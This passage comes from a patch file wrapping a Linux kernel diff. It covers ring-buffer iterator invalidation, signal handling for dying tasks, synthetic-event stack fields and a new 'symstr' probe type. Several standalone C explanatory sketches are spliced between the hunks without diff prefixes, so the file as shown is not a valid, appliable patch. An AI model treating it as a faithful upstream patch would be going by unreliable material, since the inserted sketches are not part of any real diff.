+ 		return NULL;
+-	return rb_entry(n, struct rt_mutex_waiter, tree_entry);
++	return rb_entry(n, struct rt_mutex_waiter, tree.entry);
+ }
+ 
+ static inline struct rt_mutex_waiter *
+@@ -123,7 +123,7 @@ __ww_waiter_last(struct rt_mutex *lock)
+ 	struct rb_node *n = rb_last(&lock->rtmutex.waiters.rb_root);
+ 	if (!n)
+ 		return NULL;
+-	return rb_entry(n, struct rt_mutex_waiter, tree_entry);
++	return rb_entry(n, struct rt_mutex_waiter, tree.entry);
+ }
+ 
+ static inline void
+diff --git a/kernel/signal.c b/kernel/signal.c
+index d140672185a48..5d45f5da2b36e 100644
+--- a/kernel/signal.c
++++ b/kernel/signal.c
+@@ -561,6 +561,10 @@ bool unhandled_signal(struct task_struct *tsk, int sig)
+ 	if (handler != SIG_IGN && handler != SIG_DFL)
+ 		return false;
+ 
++	/* If dying, we handle all new signals by ignoring them */
++	if (fatal_signal_pending(tsk))
++		return false;
++
+ 	/* if ptraced, let the tracer determine */
+ 	return !tsk->ptrace;
+ }
+diff --git a/kernel/trace/ring_buffer.c b/kernel/trace/ring_buffer.c
+index c264421c4ecd8..c49ed619a64dd 100644
+--- a/kernel/trace/ring_buffer.c
++++ b/kernel/trace/ring_buffer.c
+@@ -529,6 +529,8 @@ struct ring_buffer_per_cpu {
+ 	rb_time_t			before_stamp;
+ 	u64				event_stamp[MAX_NEST];
+ 	u64				read_stamp;
++	/* pages removed since last reset */
++	unsigned long			pages_removed;
+ 	/* ring buffer pages to update, > 0 to add, < 0 to remove */
+ 	long				nr_pages_to_update;
+ 	struct list_head		new_pages; /* new pages to add */
+@@ -564,6 +566,7 @@ struct ring_buffer_iter {
+ 	struct buffer_page		*head_page;
+ 	struct buffer_page		*cache_reader_page;
+ 	unsigned long			cache_read;
++	unsigned long			cache_pages_removed;
+ 	u64				read_stamp;
+ 	u64				page_stamp;
+ 	struct ring_buffer_event	*event;
+@@ -1967,6 +1970,8 @@ rb_remove_pages(struct ring_buffer_per_cpu *cpu_buffer, unsigned long nr_pages)
+ 		to_remove = rb_list_head(to_remove)->next;
+ 		head_bit |= (unsigned long)to_remove & RB_PAGE_HEAD;
+ 	}
++	/* Read iterators need to reset themselves when some pages are removed */
++	cpu_buffer->pages_removed += nr_removed;
+ 
+ 	next_page = rb_list_head(to_remove)->next;
+ 
+@@ -1988,12 +1993,6 @@ rb_remove_pages(struct ring_buffer_per_cpu *cpu_buffer, unsigned long nr_pages)
+ 		cpu_buffer->head_page = list_entry(next_page,
+ 						struct buffer_page, list);
+ 
+-	/*
+-	 * change read pointer to make sure any read iterators reset
+-	 * themselves
+-	 */
+-	cpu_buffer->read = 0;
+-
+ 	/* pages are removed, resume tracing and then free the pages */
+ 	atomic_dec(&cpu_buffer->record_disabled);
+ 	raw_spin_unlock_irq(&cpu_buffer->reader_lock);
+@@ -4385,6 +4384,7 @@ static void rb_iter_reset(struct ring_buffer_iter *iter)
+ 
+ 	iter->cache_reader_page = iter->head_page;
+ 	iter->cache_read = cpu_buffer->read;
++	iter->cache_pages_removed = cpu_buffer->pages_removed;
+ 
+ 	if (iter->head) {
+ 		iter->read_stamp = cpu_buffer->read_stamp;
+@@ -4841,12 +4841,13 @@ rb_iter_peek(struct ring_buffer_iter *iter, u64 *ts)
+ 	buffer = cpu_buffer->buffer;
+ 
+ 	/*
+-	 * Check if someone performed a consuming read to
+-	 * the buffer. A consuming read invalidates the iterator
+-	 * and we need to reset the iterator in this case.
++	 * Check if someone performed a consuming read to the buffer
++	 * or removed some pages from the buffer. In these cases,
++	 * iterator was invalidated and we need to reset it.
+ 	 */
+ 	if (unlikely(iter->cache_read != cpu_buffer->read ||
+-		     iter->cache_reader_page != cpu_buffer->reader_page))
++		     iter->cache_reader_page != cpu_buffer->reader_page ||
++		     iter->cache_pages_removed != cpu_buffer->pages_removed))
+ 		rb_iter_reset(iter);
+ 
+  again:
+@@ -5291,6 +5292,7 @@ rb_reset_cpu(struct ring_buffer_per_cpu *cpu_buffer)
+ 	cpu_buffer->last_overrun = 0;
+ 
+ 	rb_head_page_activate(cpu_buffer);
++	cpu_buffer->pages_removed = 0;
+ }
+ 
+ /* Must have disabled the cpu buffer then done a synchronize_rcu */
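/*
 * A minimal sketch of the invalidation scheme introduced above:
 * pages_removed acts as a generation counter. An iterator snapshots it
 * when it (re)positions itself and treats any later mismatch as "the
 * buffer changed underneath me, reset". Names here are illustrative.
 */
#include <assert.h>

struct buf  { unsigned long pages_removed; };
struct iter { unsigned long cache_pages_removed; };

static void iter_reset(struct iter *it, const struct buf *b)
{
	it->cache_pages_removed = b->pages_removed;
}

static int iter_stale(const struct iter *it, const struct buf *b)
{
	return it->cache_pages_removed != b->pages_removed;
}

int main(void)
{
	struct buf b = { 0 };
	struct iter it;

	iter_reset(&it, &b);
	assert(!iter_stale(&it, &b));

	b.pages_removed += 3;		/* rb_remove_pages() ran */
	assert(iter_stale(&it, &b));	/* rb_iter_peek() must reset */
	return 0;
}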
+diff --git a/kernel/trace/trace.c b/kernel/trace/trace.c
+index 27bbe180a2ef2..709af9631be45 100644
+--- a/kernel/trace/trace.c
++++ b/kernel/trace/trace.c
+@@ -5627,7 +5627,7 @@ static const char readme_msg[] =
+ 	"\t           +|-[u]<offset>(<fetcharg>), \\imm-value, \\\"imm-string\"\n"
+ 	"\t     type: s8/16/32/64, u8/16/32/64, x8/16/32/64, string, symbol,\n"
+ 	"\t           b<bit-width>@<bit-offset>/<container-size>, ustring,\n"
+-	"\t           <type>\\[<array-size>\\]\n"
++	"\t           symstr, <type>\\[<array-size>\\]\n"
+ #ifdef CONFIG_HIST_TRIGGERS
+ 	"\t    field: <stype> <name>;\n"
+ 	"\t    stype: u8/u16/u32/u64, s8/s16/s32/s64, pid_t,\n"
+diff --git a/kernel/trace/trace.h b/kernel/trace/trace.h
+index ac7af03ce8372..3d3505286aa7f 100644
+--- a/kernel/trace/trace.h
++++ b/kernel/trace/trace.h
+@@ -113,6 +113,12 @@ enum trace_type {
+ #define MEM_FAIL(condition, fmt, ...)					\
+ 	DO_ONCE_LITE_IF(condition, pr_err, "ERROR: " fmt, ##__VA_ARGS__)
+ 
++#define FAULT_STRING "(fault)"
++
++#define HIST_STACKTRACE_DEPTH	16
++#define HIST_STACKTRACE_SIZE	(HIST_STACKTRACE_DEPTH * sizeof(unsigned long))
++#define HIST_STACKTRACE_SKIP	5
++
+ /*
+  * syscalls are special, and need special handling, this is why
+  * they are not included in trace_entries.h
+diff --git a/kernel/trace/trace_events.c b/kernel/trace/trace_events.c
+index e679239864965..0447c46ef4d71 100644
+--- a/kernel/trace/trace_events.c
++++ b/kernel/trace/trace_events.c
+@@ -609,7 +609,6 @@ static int __ftrace_event_enable_disable(struct trace_event_file *file,
+ {
+ 	struct trace_event_call *call = file->event_call;
+ 	struct trace_array *tr = file->tr;
+-	unsigned long file_flags = file->flags;
+ 	int ret = 0;
+ 	int disable;
+ 
+@@ -633,6 +632,8 @@ static int __ftrace_event_enable_disable(struct trace_event_file *file,
+ 				break;
+ 			disable = file->flags & EVENT_FILE_FL_SOFT_DISABLED;
+ 			clear_bit(EVENT_FILE_FL_SOFT_MODE_BIT, &file->flags);
++			/* Disable use of trace_buffered_event */
++			trace_buffered_event_disable();
+ 		} else
+ 			disable = !(file->flags & EVENT_FILE_FL_SOFT_MODE);
+ 
+@@ -671,6 +672,8 @@ static int __ftrace_event_enable_disable(struct trace_event_file *file,
+ 			if (atomic_inc_return(&file->sm_ref) > 1)
+ 				break;
+ 			set_bit(EVENT_FILE_FL_SOFT_MODE_BIT, &file->flags);
++			/* Enable use of trace_buffered_event */
++			trace_buffered_event_enable();
+ 		}
+ 
+ 		if (!(file->flags & EVENT_FILE_FL_ENABLED)) {
+@@ -710,15 +713,6 @@ static int __ftrace_event_enable_disable(struct trace_event_file *file,
+ 		break;
+ 	}
+ 
+-	/* Enable or disable use of trace_buffered_event */
+-	if ((file_flags & EVENT_FILE_FL_SOFT_DISABLED) !=
+-	    (file->flags & EVENT_FILE_FL_SOFT_DISABLED)) {
+-		if (file->flags & EVENT_FILE_FL_SOFT_DISABLED)
+-			trace_buffered_event_enable();
+-		else
+-			trace_buffered_event_disable();
+-	}
+-
+ 	return ret;
+ }
+ 
+diff --git a/kernel/trace/trace_events_hist.c b/kernel/trace/trace_events_hist.c
+index 0f5d16eabd3b0..1470af2190735 100644
+--- a/kernel/trace/trace_events_hist.c
++++ b/kernel/trace/trace_events_hist.c
+@@ -479,10 +479,6 @@ DEFINE_HIST_FIELD_FN(u8);
+ #define for_each_hist_key_field(i, hist_data)	\
+ 	for ((i) = (hist_data)->n_vals; (i) < (hist_data)->n_fields; (i)++)
+ 
+-#define HIST_STACKTRACE_DEPTH	16
+-#define HIST_STACKTRACE_SIZE	(HIST_STACKTRACE_DEPTH * sizeof(unsigned long))
+-#define HIST_STACKTRACE_SKIP	5
+-
+ #define HITCOUNT_IDX		0
+ #define HIST_KEY_SIZE_MAX	(MAX_FILTER_STR_VAL + HIST_STACKTRACE_SIZE)
+ 
+@@ -3843,6 +3839,9 @@ static int check_synth_field(struct synth_event *event,
+ 	    && field->is_dynamic)
+ 		return 0;
+ 
++	if (strstr(hist_field->type, "long[") && field->is_stack)
++		return 0;
++
+ 	if (strcmp(field->type, hist_field->type) != 0) {
+ 		if (field->size != hist_field->size ||
+ 		    (!field->is_string && field->is_signed != hist_field->is_signed))
+diff --git a/kernel/trace/trace_events_synth.c b/kernel/trace/trace_events_synth.c
+index 89083ae1aebe3..b0d3876c96ab2 100644
+--- a/kernel/trace/trace_events_synth.c
++++ b/kernel/trace/trace_events_synth.c
+@@ -184,6 +184,14 @@ static int synth_field_is_string(char *type)
+ 	return false;
+ }
+ 
++static int synth_field_is_stack(char *type)
++{
++	if (strstr(type, "long[") != NULL)
++		return true;
++
++	return false;
++}
++
+ static int synth_field_string_size(char *type)
+ {
+ 	char buf[4], *end, *start;
+@@ -259,6 +267,8 @@ static int synth_field_size(char *type)
+ 		size = sizeof(gfp_t);
+ 	else if (synth_field_is_string(type))
+ 		size = synth_field_string_size(type);
++	else if (synth_field_is_stack(type))
++		size = 0;
+ 
+ 	return size;
+ }
+@@ -303,6 +313,8 @@ static const char *synth_field_fmt(char *type)
+ 		fmt = "%x";
+ 	else if (synth_field_is_string(type))
+ 		fmt = "%.*s";
++	else if (synth_field_is_stack(type))
++		fmt = "%s";
+ 
+ 	return fmt;
+ }
+@@ -382,6 +394,23 @@ static enum print_line_t print_synth_event(struct trace_iterator *iter,
+ 						 i == se->n_fields - 1 ? "" : " ");
+ 				n_u64 += STR_VAR_LEN_MAX / sizeof(u64);
+ 			}
++		} else if (se->fields[i]->is_stack) {
++			u32 offset, data_offset, len;
++			unsigned long *p, *end;
++
++			offset = (u32)entry->fields[n_u64];
++			data_offset = offset & 0xffff;
++			len = offset >> 16;
++
++			p = (void *)entry + data_offset;
++			end = (void *)p + len - (sizeof(long) - 1);
++
++			trace_seq_printf(s, "%s=STACK:\n", se->fields[i]->name);
++
++			for (; *p && p < end; p++)
++				trace_seq_printf(s, "=> %pS\n", (void *)*p);
++			n_u64++;
++
+ 		} else {
+ 			struct trace_print_flags __flags[] = {
+ 			    __def_gfpflag_names, {-1, NULL} };
+@@ -458,6 +487,43 @@ static unsigned int trace_string(struct synth_trace_event *entry,
+ 	return len;
+ }
+ 
++static unsigned int trace_stack(struct synth_trace_event *entry,
++				 struct synth_event *event,
++				 long *stack,
++				 unsigned int data_size,
++				 unsigned int *n_u64)
++{
++	unsigned int len;
++	u32 data_offset;
++	void *data_loc;
++
++	data_offset = struct_size(entry, fields, event->n_u64);
++	data_offset += data_size;
++
++	for (len = 0; len < HIST_STACKTRACE_DEPTH; len++) {
++		if (!stack[len])
++			break;
++	}
++
++	/* Include the zero'd element if it fits */
++	if (len < HIST_STACKTRACE_DEPTH)
++		len++;
++
++	len *= sizeof(long);
++
++	/* Find the dynamic section to copy the stack into. */
++	data_loc = (void *)entry + data_offset;
++	memcpy(data_loc, stack, len);
++
++	/* Fill in the field that holds the offset/len combo */
++	data_offset |= len << 16;
++	*(u32 *)&entry->fields[*n_u64] = data_offset;
++
++	(*n_u64)++;
++
++	return len;
++}
++
+ static notrace void trace_event_raw_event_synth(void *__data,
+ 						u64 *var_ref_vals,
+ 						unsigned int *var_ref_idx)
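/*
 * A minimal sketch (assuming the 16/16 split used above) of the data_loc
 * convention shared by trace_stack() and print_synth_event(): one u64
 * field slot carries a u32 whose low 16 bits are the offset of the
 * dynamic data from the start of the entry and whose high 16 bits are
 * its length in bytes.
 */
#include <assert.h>
#include <stdint.h>

static uint32_t pack_data_loc(uint32_t offset, uint32_t len)
{
	return (len << 16) | (offset & 0xffff);
}

int main(void)
{
	uint32_t loc = pack_data_loc(40, 96);	/* 96-byte stack at offset 40 */

	assert((loc & 0xffff) == 40);	/* data_offset, as decoded above */
	assert((loc >> 16) == 96);	/* len, as decoded above */
	return 0;
}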
+@@ -510,6 +576,12 @@ static notrace void trace_event_raw_event_synth(void *__data,
+ 					   event->fields[i]->is_dynamic,
+ 					   data_size, &n_u64);
+ 			data_size += len; /* only dynamic string increments */
++		} else if (event->fields[i]->is_stack) {
++			long *stack = (long *)(long)var_ref_vals[val_idx];
++
++			len = trace_stack(entry, event, stack,
++					   data_size, &n_u64);
++			data_size += len;
+ 		} else {
+ 			struct synth_field *field = event->fields[i];
+ 			u64 val = var_ref_vals[val_idx];
+@@ -572,6 +644,9 @@ static int __set_synth_event_print_fmt(struct synth_event *event,
+ 		    event->fields[i]->is_dynamic)
+ 			pos += snprintf(buf + pos, LEN_OR_ZERO,
+ 				", __get_str(%s)", event->fields[i]->name);
++		else if (event->fields[i]->is_stack)
++			pos += snprintf(buf + pos, LEN_OR_ZERO,
++				", __get_stacktrace(%s)", event->fields[i]->name);
+ 		else
+ 			pos += snprintf(buf + pos, LEN_OR_ZERO,
+ 					", REC->%s", event->fields[i]->name);
+@@ -708,7 +783,8 @@ static struct synth_field *parse_synth_field(int argc, char **argv,
+ 		ret = -EINVAL;
+ 		goto free;
+ 	} else if (size == 0) {
+-		if (synth_field_is_string(field->type)) {
++		if (synth_field_is_string(field->type) ||
++		    synth_field_is_stack(field->type)) {
+ 			char *type;
+ 
+ 			len = sizeof("__data_loc ") + strlen(field->type) + 1;
+@@ -739,6 +815,8 @@ static struct synth_field *parse_synth_field(int argc, char **argv,
+ 
+ 	if (synth_field_is_string(field->type))
+ 		field->is_string = true;
++	else if (synth_field_is_stack(field->type))
++		field->is_stack = true;
+ 
+ 	field->is_signed = synth_field_signed(field->type);
+  out:
+diff --git a/kernel/trace/trace_probe.c b/kernel/trace/trace_probe.c
+index bb2f95d7175c2..eef9806bb9b14 100644
+--- a/kernel/trace/trace_probe.c
++++ b/kernel/trace/trace_probe.c
+@@ -64,7 +64,7 @@ int PRINT_TYPE_FUNC_NAME(string)(struct trace_seq *s, void *data, void *ent)
+ 	int len = *(u32 *)data >> 16;
+ 
+ 	if (!len)
+-		trace_seq_puts(s, "(fault)");
++		trace_seq_puts(s, FAULT_STRING);
+ 	else
+ 		trace_seq_printf(s, "\"%s\"",
+ 				 (const char *)get_loc_data(data, ent));
+@@ -76,9 +76,11 @@ const char PRINT_TYPE_FMT_NAME(string)[] = "\\\"%s\\\"";
+ /* Fetch type information table */
+ static const struct fetch_type probe_fetch_types[] = {
+ 	/* Special types */
+-	__ASSIGN_FETCH_TYPE("string", string, string, sizeof(u32), 1,
++	__ASSIGN_FETCH_TYPE("string", string, string, sizeof(u32), 1, 1,
+ 			    "__data_loc char[]"),
+-	__ASSIGN_FETCH_TYPE("ustring", string, string, sizeof(u32), 1,
++	__ASSIGN_FETCH_TYPE("ustring", string, string, sizeof(u32), 1, 1,
++			    "__data_loc char[]"),
++	__ASSIGN_FETCH_TYPE("symstr", string, string, sizeof(u32), 1, 1,
+ 			    "__data_loc char[]"),
+ 	/* Basic types */
+ 	ASSIGN_FETCH_TYPE(u8,  u8,  0),
+@@ -662,16 +664,26 @@ static int traceprobe_parse_probe_arg_body(const char *argv, ssize_t *size,
+ 
+ 	ret = -EINVAL;
+ 	/* Store operation */
+-	if (!strcmp(parg->type->name, "string") ||
+-	    !strcmp(parg->type->name, "ustring")) {
+-		if (code->op != FETCH_OP_DEREF && code->op != FETCH_OP_UDEREF &&
+-		    code->op != FETCH_OP_IMM && code->op != FETCH_OP_COMM &&
+-		    code->op != FETCH_OP_DATA && code->op != FETCH_OP_TP_ARG) {
+-			trace_probe_log_err(offset + (t ? (t - arg) : 0),
+-					    BAD_STRING);
+-			goto fail;
++	if (parg->type->is_string) {
++		if (!strcmp(parg->type->name, "symstr")) {
++			if (code->op != FETCH_OP_REG && code->op != FETCH_OP_STACK &&
++			    code->op != FETCH_OP_RETVAL && code->op != FETCH_OP_ARG &&
++			    code->op != FETCH_OP_DEREF && code->op != FETCH_OP_TP_ARG) {
++				trace_probe_log_err(offset + (t ? (t - arg) : 0),
++						    BAD_SYMSTRING);
++				goto fail;
++			}
++		} else {
++			if (code->op != FETCH_OP_DEREF && code->op != FETCH_OP_UDEREF &&
++			    code->op != FETCH_OP_IMM && code->op != FETCH_OP_COMM &&
++			    code->op != FETCH_OP_DATA && code->op != FETCH_OP_TP_ARG) {
++				trace_probe_log_err(offset + (t ? (t - arg) : 0),
++						    BAD_STRING);
++				goto fail;
++			}
+ 		}
+-		if ((code->op == FETCH_OP_IMM || code->op == FETCH_OP_COMM ||
++		if (!strcmp(parg->type->name, "symstr") ||
++		    (code->op == FETCH_OP_IMM || code->op == FETCH_OP_COMM ||
+ 		     code->op == FETCH_OP_DATA) || code->op == FETCH_OP_TP_ARG ||
+ 		     parg->count) {
+ 			/*
+@@ -679,6 +691,8 @@ static int traceprobe_parse_probe_arg_body(const char *argv, ssize_t *size,
+ 			 * must be kept, and if parg->count != 0, this is an
+ 			 * array of string pointers instead of string address
+ 			 * itself.
++			 * For the symstr, it doesn't need to dereference, thus
++			 * it just gets the value.
+ 			 */
+ 			code++;
+ 			if (code->op != FETCH_OP_NOP) {
+@@ -690,6 +704,8 @@ static int traceprobe_parse_probe_arg_body(const char *argv, ssize_t *size,
+ 		if (!strcmp(parg->type->name, "ustring") ||
+ 		    code->op == FETCH_OP_UDEREF)
+ 			code->op = FETCH_OP_ST_USTRING;
++		else if (!strcmp(parg->type->name, "symstr"))
++			code->op = FETCH_OP_ST_SYMSTR;
+ 		else
+ 			code->op = FETCH_OP_ST_STRING;
+ 		code->size = parg->type->size;
+@@ -919,8 +935,7 @@ static int __set_print_fmt(struct trace_probe *tp, char *buf, int len,
+ 	for (i = 0; i < tp->nr_args; i++) {
+ 		parg = tp->args + i;
+ 		if (parg->count) {
+-			if ((strcmp(parg->type->name, "string") == 0) ||
+-			    (strcmp(parg->type->name, "ustring") == 0))
++			if (parg->type->is_string)
+ 				fmt = ", __get_str(%s[%d])";
+ 			else
+ 				fmt = ", REC->%s[%d]";
+@@ -928,8 +943,7 @@ static int __set_print_fmt(struct trace_probe *tp, char *buf, int len,
+ 				pos += snprintf(buf + pos, LEN_OR_ZERO,
+ 						fmt, parg->name, j);
+ 		} else {
+-			if ((strcmp(parg->type->name, "string") == 0) ||
+-			    (strcmp(parg->type->name, "ustring") == 0))
++			if (parg->type->is_string)
+ 				fmt = ", __get_str(%s)";
+ 			else
+ 				fmt = ", REC->%s";
+diff --git a/kernel/trace/trace_probe.h b/kernel/trace/trace_probe.h
+index 3d731aac94d49..f41c330bd60f1 100644
+--- a/kernel/trace/trace_probe.h
++++ b/kernel/trace/trace_probe.h
+@@ -98,6 +98,7 @@ enum fetch_op {
+ 	FETCH_OP_ST_UMEM,	/* Mem: .offset, .size */
+ 	FETCH_OP_ST_STRING,	/* String: .offset, .size */
+ 	FETCH_OP_ST_USTRING,	/* User String: .offset, .size */
++	FETCH_OP_ST_SYMSTR,	/* Kernel Symbol String: .offset, .size */
+ 	// Stage 4 (modify) op
+ 	FETCH_OP_MOD_BF,	/* Bitfield: .basesize, .lshift, .rshift */
+ 	// Stage 5 (loop) op
+@@ -133,7 +134,8 @@ struct fetch_insn {
+ struct fetch_type {
+ 	const char		*name;		/* Name of type */
+ 	size_t			size;		/* Byte size of type */
+-	int			is_signed;	/* Signed flag */
++	bool			is_signed;	/* Signed flag */
++	bool			is_string;	/* String flag */
+ 	print_type_func_t	print;		/* Print functions */
+ 	const char		*fmt;		/* Format string */
+ 	const char		*fmttype;	/* Name in format file */
+@@ -177,16 +179,19 @@ DECLARE_BASIC_PRINT_TYPE_FUNC(symbol);
+ #define _ADDR_FETCH_TYPE(t) __ADDR_FETCH_TYPE(t)
+ #define ADDR_FETCH_TYPE _ADDR_FETCH_TYPE(BITS_PER_LONG)
+ 
+-#define __ASSIGN_FETCH_TYPE(_name, ptype, ftype, _size, sign, _fmttype)	\
+-	{.name = _name,				\
++#define __ASSIGN_FETCH_TYPE(_name, ptype, ftype, _size, sign, str, _fmttype)	\
++	{.name = _name,					\
+ 	 .size = _size,					\
+-	 .is_signed = sign,				\
++	 .is_signed = (bool)sign,			\
++	 .is_string = (bool)str,			\
+ 	 .print = PRINT_TYPE_FUNC_NAME(ptype),		\
+ 	 .fmt = PRINT_TYPE_FMT_NAME(ptype),		\
+ 	 .fmttype = _fmttype,				\
+ 	}
++
++/* Non-string types can use these macros */
+ #define _ASSIGN_FETCH_TYPE(_name, ptype, ftype, _size, sign, _fmttype)	\
+-	__ASSIGN_FETCH_TYPE(_name, ptype, ftype, _size, sign, #_fmttype)
++	__ASSIGN_FETCH_TYPE(_name, ptype, ftype, _size, sign, 0, #_fmttype)
+ #define ASSIGN_FETCH_TYPE(ptype, ftype, sign)			\
+ 	_ASSIGN_FETCH_TYPE(#ptype, ptype, ftype, sizeof(ftype), sign, ptype)
+ 
+@@ -431,6 +436,7 @@ extern int traceprobe_define_arg_fields(struct trace_event_call *event_call,
+ 	C(ARRAY_TOO_BIG,	"Array number is too big"),		\
+ 	C(BAD_TYPE,		"Unknown type is specified"),		\
+ 	C(BAD_STRING,		"String accepts only memory argument"),	\
++	C(BAD_SYMSTRING,	"Symbol String doesn't accept data/userdata"),	\
+ 	C(BAD_BITFIELD,		"Invalid bitfield"),			\
+ 	C(ARG_NAME_TOO_LONG,	"Argument name is too long"),		\
+ 	C(NO_ARG_NAME,		"Argument name is not specified"),	\
+diff --git a/kernel/trace/trace_probe_kernel.h b/kernel/trace/trace_probe_kernel.h
+index 77dbd9ff97826..2da70be83831c 100644
+--- a/kernel/trace/trace_probe_kernel.h
++++ b/kernel/trace/trace_probe_kernel.h
+@@ -2,8 +2,6 @@
+ #ifndef __TRACE_PROBE_KERNEL_H_
+ #define __TRACE_PROBE_KERNEL_H_
+ 
+-#define FAULT_STRING "(fault)"
+-
+ /*
+  * This depends on trace_probe.h, but can not include it due to
+  * the way trace_probe_tmpl.h is used by trace_kprobe.c and trace_eprobe.c.
+@@ -15,16 +13,8 @@ static nokprobe_inline int
+ kern_fetch_store_strlen_user(unsigned long addr)
+ {
+ 	const void __user *uaddr =  (__force const void __user *)addr;
+-	int ret;
+ 
+-	ret = strnlen_user_nofault(uaddr, MAX_STRING_SIZE);
+-	/*
+-	 * strnlen_user_nofault returns zero on fault, insert the
+-	 * FAULT_STRING when that occurs.
+-	 */
+-	if (ret <= 0)
+-		return strlen(FAULT_STRING) + 1;
+-	return ret;
++	return strnlen_user_nofault(uaddr, MAX_STRING_SIZE);
+ }
+ 
+ /* Return the length of string -- including the null terminating byte */
+@@ -44,18 +34,14 @@ kern_fetch_store_strlen(unsigned long addr)
+ 		len++;
+ 	} while (c && ret == 0 && len < MAX_STRING_SIZE);
+ 
+-	/* For faults, return enough to hold the FAULT_STRING */
+-	return (ret < 0) ? strlen(FAULT_STRING) + 1 : len;
++	return (ret < 0) ? ret : len;
+ }
+ 
+-static nokprobe_inline void set_data_loc(int ret, void *dest, void *__dest, void *base, int len)
++static nokprobe_inline void set_data_loc(int ret, void *dest, void *__dest, void *base)
+ {
+-	if (ret >= 0) {
+-		*(u32 *)dest = make_data_loc(ret, __dest - base);
+-	} else {
+-		strscpy(__dest, FAULT_STRING, len);
+-		ret = strlen(__dest) + 1;
+-	}
++	if (ret < 0)
++		ret = 0;
++	*(u32 *)dest = make_data_loc(ret, __dest - base);
+ }
+ 
+ /*
+@@ -76,7 +62,7 @@ kern_fetch_store_string_user(unsigned long addr, void *dest, void *base)
+ 	__dest = get_loc_data(dest, base);
+ 
+ 	ret = strncpy_from_user_nofault(__dest, uaddr, maxlen);
+-	set_data_loc(ret, dest, __dest, base, maxlen);
++	set_data_loc(ret, dest, __dest, base);
+ 
+ 	return ret;
+ }
+@@ -107,7 +93,7 @@ kern_fetch_store_string(unsigned long addr, void *dest, void *base)
+ 	 * probing.
+ 	 */
+ 	ret = strncpy_from_kernel_nofault(__dest, (void *)addr, maxlen);
+-	set_data_loc(ret, dest, __dest, base, maxlen);
++	set_data_loc(ret, dest, __dest, base);
+ 
+ 	return ret;
+ }
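/*
 * A minimal sketch of the new fault convention: instead of copying
 * "(fault)" into the dynamic area, a failed fetch now records a
 * zero-length data_loc, and the print side (PRINT_TYPE_FUNC_NAME(string)
 * above) emits FAULT_STRING whenever len == 0. make_loc() mirrors the
 * kernel's make_data_loc() macro: high 16 bits length, low 16 offset.
 */
#include <assert.h>
#include <errno.h>
#include <stdint.h>

static uint32_t make_loc(int len, int offs)
{
	return ((uint32_t)len << 16) | ((uint32_t)offs & 0xffff);
}

int main(void)
{
	int ret = -EFAULT;			/* a failed copy */
	uint32_t loc = make_loc(ret < 0 ? 0 : ret, 64);

	assert((loc >> 16) == 0);	/* printer sees len == 0 -> FAULT_STRING */
	return 0;
}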
+diff --git a/kernel/trace/trace_probe_tmpl.h b/kernel/trace/trace_probe_tmpl.h
+index c293a607d5366..3e2f5a43b974c 100644
+--- a/kernel/trace/trace_probe_tmpl.h
++++ b/kernel/trace/trace_probe_tmpl.h
+@@ -67,6 +67,37 @@ probe_mem_read(void *dest, void *src, size_t size);
+ static nokprobe_inline int
+ probe_mem_read_user(void *dest, void *src, size_t size);
+ 
++static nokprobe_inline int
++fetch_store_symstrlen(unsigned long addr)
++{
++	char namebuf[KSYM_SYMBOL_LEN];
++	int ret;
++
++	ret = sprint_symbol(namebuf, addr);
++	if (ret < 0)
++		return 0;
++
++	return ret + 1;
++}
++
++/*
++ * Fetch a null-terminated symbol string + offset. Caller MUST set *(u32 *)buf
++ * with max length and relative data location.
++ */
++static nokprobe_inline int
++fetch_store_symstring(unsigned long addr, void *dest, void *base)
++{
++	int maxlen = get_loc_len(*(u32 *)dest);
++	void *__dest;
++
++	if (unlikely(!maxlen))
++		return -ENOMEM;
++
++	__dest = get_loc_data(dest, base);
++
++	return sprint_symbol(__dest, addr);
++}
++
+ /* From the 2nd stage, routine is same */
+ static nokprobe_inline int
+ process_fetch_insn_bottom(struct fetch_insn *code, unsigned long val,
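/*
 * A minimal usage sketch (kernel context; not part of the patch) of the
 * primitive the new symstr type is built on: sprint_symbol() renders an
 * address as "name+offset/size [module]" into a KSYM_SYMBOL_LEN buffer
 * and returns the string length, which is why fetch_store_symstrlen()
 * above reserves ret + 1 bytes for the trailing NUL.
 */
#include <linux/kallsyms.h>
#include <linux/printk.h>

static void show_symstr(unsigned long addr)
{
	char buf[KSYM_SYMBOL_LEN];

	sprint_symbol(buf, addr);	/* e.g. "vfs_read+0x10/0x1a0" */
	pr_info("symstr: %s\n", buf);
}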
+@@ -99,16 +130,22 @@ stage2:
+ stage3:
+ 	/* 3rd stage: store value to buffer */
+ 	if (unlikely(!dest)) {
+-		if (code->op == FETCH_OP_ST_STRING) {
++		switch (code->op) {
++		case FETCH_OP_ST_STRING:
+ 			ret = fetch_store_strlen(val + code->offset);
+ 			code++;
+ 			goto array;
+-		} else if (code->op == FETCH_OP_ST_USTRING) {
+-			ret += fetch_store_strlen_user(val + code->offset);
++		case FETCH_OP_ST_USTRING:
++			ret = fetch_store_strlen_user(val + code->offset);
+ 			code++;
+ 			goto array;
+-		} else
++		case FETCH_OP_ST_SYMSTR:
++			ret = fetch_store_symstrlen(val + code->offset);
++			code++;
++			goto array;
++		default:
+ 			return -EILSEQ;
++		}
+ 	}
+ 
+ 	switch (code->op) {
+@@ -129,6 +166,10 @@ stage3:
+ 		loc = *(u32 *)dest;
+ 		ret = fetch_store_string_user(val + code->offset, dest, base);
+ 		break;
++	case FETCH_OP_ST_SYMSTR:
++		loc = *(u32 *)dest;
++		ret = fetch_store_symstring(val + code->offset, dest, base);
++		break;
+ 	default:
+ 		return -EILSEQ;
+ 	}
+@@ -206,13 +247,9 @@ store_trace_args(void *data, struct trace_probe *tp, void *rec,
+ 		if (unlikely(arg->dynamic))
+ 			*dl = make_data_loc(maxlen, dyndata - base);
+ 		ret = process_fetch_insn(arg->code, rec, dl, base);
+-		if (arg->dynamic) {
+-			if (unlikely(ret < 0)) {
+-				*dl = make_data_loc(0, dyndata - base);
+-			} else {
+-				dyndata += ret;
+-				maxlen -= ret;
+-			}
++		if (arg->dynamic && likely(ret > 0)) {
++			dyndata += ret;
++			maxlen -= ret;
+ 		}
+ 	}
+ }
+diff --git a/kernel/trace/trace_synth.h b/kernel/trace/trace_synth.h
+index b29595fe3ac5a..43f6fb6078dbf 100644
+--- a/kernel/trace/trace_synth.h
++++ b/kernel/trace/trace_synth.h
+@@ -18,6 +18,7 @@ struct synth_field {
+ 	bool is_signed;
+ 	bool is_string;
+ 	bool is_dynamic;
++	bool is_stack;
+ };
+ 
+ struct synth_event {
+diff --git a/kernel/trace/trace_uprobe.c b/kernel/trace/trace_uprobe.c
+index fb58e86dd1178..2ac06a642863a 100644
+--- a/kernel/trace/trace_uprobe.c
